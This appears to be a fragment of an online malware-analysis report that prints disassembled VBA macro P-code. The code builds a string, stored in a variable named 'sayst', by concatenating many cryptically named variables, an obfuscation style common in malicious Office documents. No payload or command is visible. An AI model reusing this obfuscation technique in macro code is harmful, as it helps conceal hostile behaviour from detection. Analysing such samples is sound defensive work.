' Ld gFe
' Add
' Ld NoP
' Add
' Ld QrS
' Add
' Ld DeF
' Add
' Ld UvW
' Add
' Ld DeF
' Add
' Ld QrS
' Add
' Ld ttk
' Add
' St sayst
' Line #85:
' Ld WP
' Ld Spb
' Add
' Ld HiJ
' Add
' Ld RsT
' Add
' Ld Spb
' Add
' Ld cbd
' Add
' Ld QrS
' Add
' Ld NoP
' Add
' Ld lkm
' Add
' Ld DeF
' Add
' Ld MnO
' Add
' Ld Spb
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.